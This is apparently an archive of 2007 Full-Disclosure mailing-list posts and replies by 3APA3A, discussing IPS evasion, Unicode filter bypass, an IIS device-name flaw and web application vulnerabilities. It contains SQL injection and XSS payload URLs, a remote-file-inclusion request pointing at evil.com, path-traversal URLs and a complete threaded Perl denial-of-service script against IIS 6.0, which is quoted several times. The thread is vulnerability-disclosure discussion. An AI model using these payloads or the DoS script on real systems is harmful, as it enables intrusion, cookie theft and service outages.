jkc> mechanisms.  Digg and Slashdot are both examples of what I'm suggesting.

This  subject  arises  here  twice  an  year.  List needs _professional_
moderation, like Bugtraq has. because:

1.  Next  thing  to  research  will  be  attacks against community-based
filtering mechanisms.

2.  No, thanks, see enough "community moderators" things with Wikipedia,
where  sense  of  good always hits common sense. It's well known who has
high  desire  to moderate: not a professional with deep topic knowledge.
Michael   Zalewski  was  filtered  from  "hackers"  for  few  years  for
self-promotion  (Was  it  Stallman  who  edited  this article or 15-year
schoolboy  who  read nothing but few articles about... let me remember..
Melissa  worm?). Bad for you, Michael, you promote yourself again! I was
not  able  to  add article about free open source software, as I am only
listed software developer (I really am): it's promotion. Just wonder: if
somebody  looks for specific software in Wikipedia, is it better to have
potentially  promotional  article  from  it's  developer  or do not have
article at all?


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] PIRS2007 local buffer overflow vulnerability

[3APA3A]

Dear [EMAIL PROTECTED],

Please explain why is this "vulnerability" and not "just the bug".

--Friday, July 13, 2007, 5:26:17 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

esvnc> TeamIntell discovered local buffer overflow vulnerability 
esvnc> in PIRS2007 (data collection of companies and active 
esvnc> business subjects in Slovenia). Please see the attached 
esvnc> security advisory for details.

esvnc> Vendor has released a patch that solves this issue.
esvnc> Download link:
esvnc> http://www.pirs.si/slo/index.php?dep_id=29&help_id=60

esvnc> Edi Strosar
esvnc> (TeamIntell)


-- 
~/ZARAZA http://securityvulns.com/
Ęîăäŕ ďňč÷ęŕ ďîăčáŕĺň îň îáćîđńňâŕ, ĺĺ íŕíčçűâŕţň íŕ âĺđňĺë.  (Ëĺě)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] TippingPoint IPS Signature Evasion

[3APA3A]

Dear Paul Craig,

--Wednesday, July 11, 2007, 1:37:03 AM, you wrote to [EMAIL PROTECTED]:


PC> http://www.test.com/scripts%c0%afcmd.exe
PC> http://www.test.com/scripts%e0%80%afcmd.exe
PC> http://www.test.com/scripts%c1%9ccmd.exe

PC> Web servers located behind a Tippingpoint IPS device which are capable
PC> of decoding alternate Unicode characters can be accessed, and exploited
PC> without triggering the IPS device.

Can  you,  please, provide example of such server? Fatih Ozavci reported
similar   problem   with  Checkpoint  and  Halfwidth/Fullwidth  Unicode,
potential  attack  vector  was IIS with .Net framework, in this case IIS
seems not to be exploitable.

Blaming IPS it does not detect attack which is impossible in-the-wild is
nonsense. Blaming corporate-level IPS doesn't detect attack against SOHO
web server is acceptable nonsense :)

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] durito: enVivo!CMS SQL injection

[3APA3A]

Dear [EMAIL PROTECTED],

  durito  [damagelab]  -durito[at]mail[dot]ru-  reported  SQL  injection
  vulnerability in enVivo!CMS through ID parameter of default.asp.

  Example:

  
http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)--

  Original message (in Russian): http://securityvulns.ru/Rdocument425.html

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Moodle XSS / Liesbeth base CMS sensitive information disclosure

[3APA3A]

Dear [EMAIL PROTECTED],

1.
  MustLive  (mustlive  at  websecurity.com  dot  ua)  reported  crossite
  scripting  vulnerability  in  Moodle  1.7.1  via  search  parameter of
  index.php, example:

  
http://host/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20

  Detailed information (in Ukranian) http://websecurity.com.ua/1045/
  Original message (in Russian) http://securityvulns.ru/Rdocument391.html

2.
  Durito  [damagelab]  (durito at mail dot ru) reported information leak
  in Liesbeth base CMS (Vendor: www.doubleflex.com), example:
  
  http://host/config.inc

  file  accessible through Web contains sensitive information, including
  database account.

  Original message (in Russian) http://securityvulns.ru/Rdocument392.html

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

[3APA3A]

Dear Jamie Riden,

--Wednesday, June 20, 2007, 4:39:21 PM, you wrote to [EMAIL PROTECTED]:


JR> (This is what I gathered from the original posting, but I might be wrong.)

JR> I think the issue is not that the apache server behaviour is wrong as
JR> such,

Original  BreakingPoint  articles  author  refers to says "The intent is
describe  the  strange  behaviors  of network applications". It mentions
neither  of  IPS  products, but IIS and Apache. And at least one case of
Apache  behavior  is  partially  expected  (because  of RFC) and already
described (by Michal Majchrowicz).

JR> but that IDS/IPS do not use the same algorithm as apache for
JR> checking validity of HTTP requests. Thus apache may accept and process
JR> a request like:

JR> 
\r\n\r\n\r\n\r\n\r\n\x0c/rfi.php?includedir=http://evil.com\x0bHTTP/1.0\r\n\r\n

IPS  may  detect  known attacks. Just like antivirus, you may use IPS to
protected  against known viruses/exploits. An ability to bypass IPS with
new one is not a bug. I do collect different content filtering bypassing
methods:

http://securityvulns.com/advisories/content.asp

You  simply  MUST  accept  the  risk  there  is always the way to bypass
content  filtering. IPS like doesn't protect your network by itself. IPS
is nothing, but a tool.

JR> but that the IDS/IPS will ignore that packet on the grounds that "it's
JR> not a valid HTTP request"., when it should actually be alerting that a
JR> RFI attempt was made.

In  this  situation IDS/IPS should alert unsupported request attempt was
made and block this attempt in case of IPS.

JR> While we're on the subject of IDS, it looks like PHP 5 supports a new
JR> wrapper php://filter, such that a RFI may be performed by: GET
JR> /rfi.php?includedir=php://filter/resource=http://www.evil.com - which
JR> may not be detected by some existing IDS signatures. (See
JR> http://uk2.php.net/manual/en/wrappers.php.php )

I  can  write  buggy application and attempt to exploit it will never be
detected by existing signatures.

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] IPS Evasion with the Apache HTTP Server

[3APA3A]

Dear H D Moore,

--Tuesday, June 19, 2007, 11:20:41 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

HDM> $  echo  -ne "\r\n\r\n\r\n\r\n\r\n /buggy.php HTTP/1.0\r\n\r\n" | \
HDM> nc webserver 80

According  to  recommendations  of  RFC  2616, section 4.1 Web server or
proxy  server  should  ignore \r\n before request for compatibility with
odd  clients  sending  trailing  \r\n  with POST requests via keep-alive
connections:

   In the interest of robustness, servers SHOULD ignore any empty
   line(s) received where a Request-Line is expected. In other words, if
   the server is reading the protocol stream at the beginning of a
   message and receives a CRLF first, it should ignore the CRLF.

$ echo -ne " /buggy.php HTTP/1.0\r\n\r\n" | nc webserver 80

Does the same job. This problem (unsupported request method) was already
reported by Michal Majchrowicz, see

http://securityvulns.com/Qdocument846.html


-- 
~/ZARAZA http://securityvulns.com/
Электрические шоки очень полезны для формирования характера. (Лем)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] ShAnKaR: Simle machines forum CAPTCHA bypass and PHP injection

[3APA3A]

Dear [EMAIL PROTECTED],

  ShAnKaR   reported vulnerabilities in Simple
  Machines Forum 1.1.2 (aka SMF) http://www.simplemachines.org/

  Original advisory (in Russian):
  http://securityvulns.ru/Rdocument271.html

1. Weak sound-based CAPTCHA protection

   In  this engine sound CAPTCHA based automated registration protection
   is  implemented  with  a  WAV file, generated by concatenation of few
   different  sound  files.  Developers  use WAV file randomization, but
   this   randomization   is   insufficient   and  can  be  bypassed  by
   bruteforcing with known sound templates.

[EMAIL PROTECTED] smfh]$ ./captcha.pl http://localhost/smf/
nnrbv
created in 1.41827201843262 seconds
[EMAIL PROTECTED] smfh]$ ./captcha.pl http://localhost/smf/
vpubu
created in 1.49515509605408 seconds
[EMAIL PROTECTED] smfh]$ ./captcha.pl http://localhost/smf/
ntfhh
created in 2.31928586959839 seconds
[EMAIL PROTECTED] smfh]$ ./captcha.pl http://localhost/smf/
egudz
created in 0.823321104049683 seconds

  As  it  can  be  seen,  bruteforce usually takes only 1-2 seconds. See
  script attached.

2. PHP injection

There  is  a  possibility  to  execute  any  PHP code during creation or
editing of forum message.
(no further details is given by advisory author).




-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

capcha.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[3APA3A]

Dear kingcope,

With debugging it looks quite harmless:

Server Error in '/' Application.


Directory '\\.\aux' does not exist. Failed to start monitoring file changes. 
Description: An unhandled exception occurred during the execution of the 
current web request. Please review the stack trace for more information about 
the error and where it originated in the code. 

Exception Details: System.Web.HttpException: Directory '\\.\aux' does not 
exist. Failed to start monitoring file changes.

Source Error: 

An unhandled exception was generated during the execution of the current web 
request. Information regarding the origin and location of the exception can be 
identified using the exception stack trace below.  

Stack Trace: 


[HttpException (0x80070002): Directory '\\.\aux' does not exist. Failed to 
start monitoring file changes.]
   System.Web.FileChangesMonitor.FindDirectoryMonitor(String dir, Boolean 
addIfNotFound, Boolean throwOnError) +527
   System.Web.FileChangesMonitor.StartMonitoringPath(String alias, 
FileChangeEventHandler callback) +477
   System.Web.Caching.CacheDependency.Init(Boolean isPublic, Boolean 
isSensitive, String[] filenamesArg, String[] cachekeysArg, CacheDependency 
dependency, DateTime utcStart) +1535
   System.Web.Caching.CacheDependency..ctor(Boolean isSensitive, String[] 
filenames, DateTime utcStart) +50
   
System.Web.Configuration.HttpConfigurationSystem.GetCacheDependencies(Hashtable 
cachedeps, DateTime utcStart) +151
   System.Web.Configuration.HttpConfigurationSystem.ComposeConfig(String 
reqPath, IHttpMapPath configmap) +760
   System.Web.HttpContext.GetCompleteConfigRecord(String reqpath, IHttpMapPath 
configmap) +434
   System.Web.HttpContext.GetCompleteConfig() +49
   System.Web.HttpContext.GetConfig(String name) +195
   System.Web.CustomErrors.GetSettings(HttpContext context, Boolean canThrow) 
+20
   System.Web.HttpResponse.ReportRuntimeError(Exception e, Boolean canThrow) +39
   System.Web.HttpRuntime.FinishRequest(HttpWorkerRequest wr, HttpContext 
context, Exception e) +486

 



Version Information: Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET 
Version:1.1.4322.2032 

--Wednesday, May 23, 2007, 1:35:17 PM, you wrote to [EMAIL PROTECTED]:

k> Btw,
k> Here is a screenshot of the effect.


k> -Original Message-
k> From: kingcope [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:55 AM
k> To: '3APA3A'
k> Cc: 'Full-Disclosure'; '[EMAIL PROTECTED]'
k> Subject: RE: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's  vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application
>>from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some
k> servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to a IIS 6.0 server
k> requesting
k>> #/AUX/.aspx the server gets instable and non responsive. This happens
k> only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope [EMAIL PROTECTED]
k>>
k> 

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[3APA3A]

Dear kingcope,

Funny enough, there is a chance this vulnerability can also be exploited
as  a  local  unauthorized  access  or  privilege escalation, to execute
user-supplied  .aspx  script  from  COM  port (via serial cable) without
having   console   access   with   permissions   of   Web   application.
IWAM_%COMPUTERNAME%  is default, but it's often elevated for application
pools for different reasons.

Need to be tested though.

Same  vulnerability  existed  in IndigoPerl some time ago. See "One more
funny bug" in http://securityvulns.com/docs6145.html


--Wednesday, May 23, 2007, 12:54:35 PM, you wrote to [EMAIL PROTECTED]:

k> Hello Russian friend,

k> This is an interesting thought. As you see in the exception
k> And in the exception backtrace of IIS it tries to access \\.\AUX
k> Or other special device names. Normally this is blocked by a
k> C# method which checks the path (for example /AUX.aspx is blocked).


k> Best Regards,

k> Kingcope

k> -----Original Message-
k> From: 3APA3A [mailto:[EMAIL PROTECTED] 
k> Sent: Wednesday, May 23, 2007 10:41 AM
k> To: kingcope
k> Cc: Full-Disclosure; [EMAIL PROTECTED]
k> Subject: Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

k> Dear kingcope,

k> It's  vulnerability regardless of DoS impact, because it allows attacker
k> to access special DOS devices (COM1 in this case). E.g. it could be used
k> to read data from device attached to COM1 or prevent another application
>>from accessing this port (or LPT), because access to ports is exclusive.

k> --Tuesday, May 22, 2007, 9:10:08 AM, you wrote to
k> full-disclosure@lists.grok.org.uk:

k>> Hello List,

k>> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k>> When I request /AUX/.aspx the server takes a bit longer to respond as
k>> Normally. So I did write an automated script to see what happens if
k>> I request this file several times at once. The result is that some
k> servers
k>> On the internet get quite instable, some do not. On some servers after I
k>> Stop the attack I get an exception that the Server is too busy/Unhandled
k>> Exception on the wwwroot (/) path.
k>> Can you/the list confirm that?

k>> Here is a lame testing script for this stuff:





k>> #When sending multiple parallel GET requests to a IIS 6.0 server
k> requesting
k>> #/AUX/.aspx the server gets instable and non responsive. This happens
k> only
k>> #to servers which respond a runtime error (System.Web.HttpException)
k>> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k>> #
k>> #
k>> #signed,
k>> #Kingcope [EMAIL PROTECTED]
k>>
k> ##
k>>
k> ###***
k>> ###
k>> ###
k>> ###
k>> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k>> ### by Kingcope, May/2007
k>> ### Better run this from a Linux system
k>>
k> ##

k>> use IO::Socket;
k>> use threads;

k>> if ($ARGV[0] eq "") { exit; }
k>> my $host = $ARGV[0];

k>> $|=1;

k>> sub sendit {
k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>   PeerPort => 'http(80)',
k>>   Proto=> 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";
k>> }

k>> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>>   PeerPort => 'http(80)',
k>>   Proto=> 'tcp');

k>> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k>> $host\r\nConnection:close\r\n\r\n";

k>> $k=0;
k>> while (<$sock>) {
k>> if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>> $k=1;
k>> last;
k>> }
k>> }

k>> if ($k==0) {
k>> print "Server does not seem vulnerable to this attack.\n";
k>> exit;   
k>> }

k>> print "ATTACK!\n";

k>> while(1){

k>> for (my $i=0;$i<=100;$i++) {
k>> $thr = threads->new(\&sendit);
k>> print "\r\r\r$i/100";
k>> }

k>> foreach $thr (threads->list) {
k>> $thr->join;
k>> }
k>> }


k>> ___
k>> Full-Disclosure - We believe in it.
k>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k>> Hosted and sponsored by Secunia - http://secunia.com/




-- 
~/ZARAZA http://securityvulns.com/
Таким образом он умирает в шестой раз - и опять на новом месте. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Question Regarding IIS 6.0 / Is this a DoS???

[3APA3A]

Dear kingcope,

It's  vulnerability regardless of DoS impact, because it allows attacker
to access special DOS devices (COM1 in this case). E.g. it could be used
to read data from device attached to COM1 or prevent another application
from accessing this port (or LPT), because access to ports is exclusive.

--Tuesday, May 22, 2007, 9:10:08 AM, you wrote to 
full-disclosure@lists.grok.org.uk:

k> Hello List,

k> Recently I saw a small bug in IIS 6.0 when requesting a special path.
k> When I request /AUX/.aspx the server takes a bit longer to respond as
k> Normally. So I did write an automated script to see what happens if
k> I request this file several times at once. The result is that some servers
k> On the internet get quite instable, some do not. On some servers after I
k> Stop the attack I get an exception that the Server is too busy/Unhandled
k> Exception on the wwwroot (/) path.
k> Can you/the list confirm that?

k> Here is a lame testing script for this stuff:





k> #When sending multiple parallel GET requests to a IIS 6.0 server requesting
k> #/AUX/.aspx the server gets instable and non responsive. This happens only
k> #to servers which respond a runtime error (System.Web.HttpException)
k> #and take two or more seconds to respond to the /AUX/.aspx GET request.
k> #
k> #
k> #signed,
k> #Kingcope [EMAIL PROTECTED]
k> ##
k> ###***
k> ###
k> ###
k> ###
k> ### Lame Internet Information Server 6.0 Denial Of Service (nonpermanent)
k> ### by Kingcope, May/2007
k> ### Better run this from a Linux system
k> ##

k> use IO::Socket;
k> use threads;

k> if ($ARGV[0] eq "") { exit; }
k> my $host = $ARGV[0];

k> $|=1;

k> sub sendit {
k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";
k> }

k> $sock = IO::Socket::INET->new(PeerAddr => $host,
k>   PeerPort => 'http(80)',
k>   Proto=> 'tcp');

k> print $sock "GET /AUX/.aspx HTTP/1.1\r\nHost:
k> $host\r\nConnection:close\r\n\r\n";

k> $k=0;
k> while (<$sock>) {
k>  if (($_ =~ /Runtime\sError/) || ($_ =~ /HttpException/)) {
k>  $k=1;
k>  last;
k>  }
k> }

k> if ($k==0) {
k>  print "Server does not seem vulnerable to this attack.\n";
k>  exit;   
k> }

k> print "ATTACK!\n";

k> while(1){

k> for (my $i=0;$i<=100;$i++) {
k>  $thr = threads->new(\&sendit);
k>  print "\r\r\r$i/100";
k> }

k> foreach $thr (threads->list) {
k>  $thr->join;
k> }
k> }


k> ___
k> Full-Disclosure - We believe in it.
k> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
k> Hosted and sponsored by Secunia - http://secunia.com/


-- 
~/ZARAZA http://securityvulns.com/
Ибо факты есть факты, и изложены они лишь для того, чтобы их поняли и в них 
поверили. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Unicode Left/Right Pointing Double Angel Quotation Mark bypass?

[3APA3A]

Dear full-disclosure@lists.grok.org.uk,

  By  the  way:  I saw Unicode Left Pointing Double Angel Quotation Mark
  (%u00AB) / Unicode Right Pointing Double Angel Quotation Mark (%u00BB)
  are  sometimes  translated  to '<' and '>'. Does somebody experimented
  with

  %u00ABscript%u00BB

  in different environments to bypass filtering in this way?

-- 
http://securityvulns.com/
 /\_/\
{ , . } |\
+--oQQo->{ ^ }<-+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-o66o--+ /
|/

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] noise about full-width encoding bypass?

[3APA3A]

Dear Brian Eaton,

--Monday, May 21, 2007, 11:28:27 PM, you wrote to [EMAIL PROTECTED]:


BE> Given how few application platforms decode full-width unicode to ASCII
BE> equivalents, is there a case to be made that those application
BE> platforms that do decide this conversion is a good idea are broken?

BE> Put another way: should this be considered a bug in ASP.NET?

BE> Regards,
BE> Brian

Converting  e.g.  Unicode  full-width  'A'  into ASCII 'A' is definitely
valid and expected behavior. A bug is using unfiltered input in HTML/SQL
generation.  As for inability of content filter to catch this situation,
it's just one more way to bypass it. See

http://securityvulns.com/advisories/content.asp
http://securityvulns.com/advisories/bypassing.asp


-- 
~/ZARAZA http://securityvulns.com/
Итак, я буду краток. (Твен)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] noise about full-width encoding bypass?

[3APA3A]

Dear Brian Eaton,

--Monday, May 21, 2007, 11:48:09 PM, you wrote to [EMAIL PROTECTED]:

BE> On 5/21/07, 3APA3A <[EMAIL PROTECTED]> wrote:
>> It's not true, because it's quite convertible character. At least for IIS:
>>
>> http://example.com/test.asp?q=%uFF1Cscript>alert("Hello")
>>
>> where test.asp is
>>
>> <%=Request.QueryString("q")%>
>>
>> launches javascript.

BE> This does not work for me for IIS 6 and IE 7.  What platform did you test?

Windows  2003  Server Std. Russian + All updates. It may actually depend
on  default  server language/charset, because text is actually converted
to ANSI charset, not to ASCII. Mine is Windows-1251.


BE> Regards,
BE> Brian

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] noise about full-width encoding bypass?

[3APA3A]

Dear Brian Eaton,

--Monday, May 21, 2007, 6:22:21 PM, you wrote to [EMAIL PROTECTED]:


BE> If the SQL engine is processing queries in ASCII or ISO-8859-1, the
BE> conversion from unicode to the code page used by the engine will fail.
BE>  Either the engine will give up on the query, or it might substitute a
BE> question mark (?) for the unconvertible character.

It's not true, because it's quite convertible character. At least for IIS:

http://example.com/test.asp?q=%uFF1Cscript>alert("Hello")

where test.asp is

<%=Request.QueryString("q")%>

launches javascript.

BTW:  It  may be used to bypass keyword based filtering to create, e.g.
porn pages available through any corporate firewall. See

http://securityvulns.ru/files/p.html

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Retrieving "deleted" sms/mms from Nokia phone (Symbian S60)

[3APA3A]

Dear Davide Del Vecchio,

 It's also possible to recover deleted photos from almost any flash card
 in almost any device (camera, mobile, etc) - it's a way general purpose
 file  systems  work.  Requirement  to  delete  information  securely is
 enforced  in devices certified to e.g. process US military secretes. In
 this case, device must follow DoD 5220-22-M recommendations and you can
 expect  secure erase. In general purpose operation systems and devices,
 todelete   information   securely   (wipe   it)   some   additional
 actions/utilities are usually required.

--Tuesday, May 15, 2007, 9:09:19 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

DDV> Hello list,

DDV> During some research, I found an intersting "feature"
DDV> on my Nokia mobile phone; I was able to retrieve any
DDV> apparently deleted sms/mms.


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Medium security hole affecting DSL-G624T

[3APA3A]

Dear Tim Brown,



--Friday, May 4, 2007, 1:50:40 AM, you wrote to [EMAIL PROTECTED]:

TB> On Thursday 03 May 2007 22:13:15 3APA3A wrote:

>> This  vulnerability  for  D-Link  DSL-G624T was already reported by Jose
>> Ramon Palanco. See
>>
>> http://securityvulns.ru/Odocument816.html
>>

TB> However,
TB> as I also point out in the Solutions section, all of the issues you list 
were 
TB> against major version 1 of the firmware.  We're now at major version 3 and 
TB> directory traversal is still a problem. 

Not exactly, read first link carefully:

Tested on D-Link DSL-G624T
Version: Firmware Version : V3.00B01T01.YA-C.20060616

Discovered by:

Jose Ramon Palanco: jose.palanco(at)eazel(dot).es

These firmware date is even newer than yours :)

TB> Secondly, the Javascript injection issue describe is as far as I 
TB> know /entirely new/.  It's not a short walk to the point where these two
TB> issues alone could be use to compromise devices, irrespective of the 
firmware
TB> issues you also link to.

Jose  mentions  both  directory  traversal  and  3  examples of crossite
scripting.  Crossite  scripting examples are different from yours though
and require POST request. Your CSS is easier to exploit.

TB> Maybe, I'm hoping that by version 10 of the firmware in the year 2014, 
D-Link
TB> may actually manage to fix some of these reported problems?  Moreover, maybe
TB> they'll actually make it possible for researchers to report these things in 
a
TB> manner whereby they actually respond to the reports when contacted.  Not
TB> holding my breath though.

In  fact,  at least Russian D-Link support is very responsive to any bug
report,  but  it  seems  like  only  way  to get a response is to post a
problem on their forum.

-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Medium security hole affecting DSL-G624T

[3APA3A]

Dear Tim Brown,

This  vulnerability  for  D-Link  DSL-G624T was already reported by Jose
Ramon Palanco. See

http://securityvulns.ru/Odocument816.html

Previously, same problem was reported for D-Link DSL-G604T by Qex

http://securityvulns.ru/Mdocument578.html


There were also few more problems reported about /cgi-bin/webcm, see

http://securityvulns.ru/Idocument664.html
http://securityvulns.ru/Idocument759.html



--Thursday, May 3, 2007, 2:43:58 AM, you wrote to [EMAIL PROTECTED]:

TB> Hi,

TB> I've identified a couple of security flaws affecting the DSL-G624T firmware.
TB> I believe the directory traversal issue has been reported in other devices /
TB> firmware versions supplied by D-Link but not the combination I tested and
TB> clearly has not been resolved.  Additionally, the Javascript injection issue
TB> is I believe new and has not been reported on any device.

TB> These issues were reported by email to the vendor at the usual addresses
TB> (support/security/etc) without response on 13th April 2007.  I also 
attempted
TB> to log faults on the vendors support web site but sadly, it would not
TB> function adequately using either Firefox nor Konqueror.

TB> Tim


-- 
~/ZARAZA http://securityvulns.com/
Åñëè äàæå âû ïîëó÷èòå êàêîå-íèáóäü ïèñüìî, âû âñå ðàâíî íå ñóìååòå åãî 
ïðî÷èòàòü. (Òâåí)

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Firefox 2.0.0.3 Phishing Protection Bypass Vulnerability

[3APA3A]

Dear carl hardwick,

 Do you know examples of phishing sites exploiting this vulnerability?

--Wednesday, April 18, 2007, 1:47:03 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

ch> This flaw
ch> 
http://kaneda.bohater.net/security/20070111-firefox_2.0.0.1_bypass_phishing_protection.php
ch> remains
ch> upatched since months!!!
ch> Firefox 2.0.0.1, 2.0.0.2, 2.0.0.3 are still vulnerable!
ch> https://bugzilla.mozilla.org/show_bug.cgi?id=367538


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Internet Explorer Crash

[3APA3A]

Dear carl hardwick,

Both  Firefox  2.0.0.3  and  IE  6.0.2900.2180  resisted  (Firefox stops
loading  page  after 500MB of memory, IE warns about script slowing down
performance).  It's  simple  memory  bomb,  probably  you are vulnerable
because you have <= 512 MB of RAM.

--Tuesday, April 17, 2007, 10:56:14 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

ch> Mozilla Firefox 2.0.0.3 is also vulnerable


-- 
~/ZARAZA http://securityvulns.com/


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Mozilla Firefox Insecure Element Stealth Injection Vulnerability

[3APA3A]

Dear Michal Majchrowicz,

 This feature is not intended to protect against XSS, it's only intended
 to  inform  you  some  information is transmitted in cleartext. You can
 simply change

 src="http://server2.com/xss.js

 to

 src="https://server2.com/xss.js

 to avoid this message.

--Wednesday, April 4, 2007, 3:29:14 PM, you wrote to 
full-disclosure@lists.grok.org.uk:

MM> When user visits sites over HTTPS protocol he is informed by the Web
MM> Browser everytime the site tries to load unsecured (using HTTP
MM> protocol) element (script/iframe/object etc.).
MM> So for instance if we have XSS vulnerable site
MM> https://server.com/vuln.php?id=";>alert(document.cookie);
MM> Everybrowser will execute it without any complains since they cannot
MM> know where the code comes from. But this example will cause a warning:
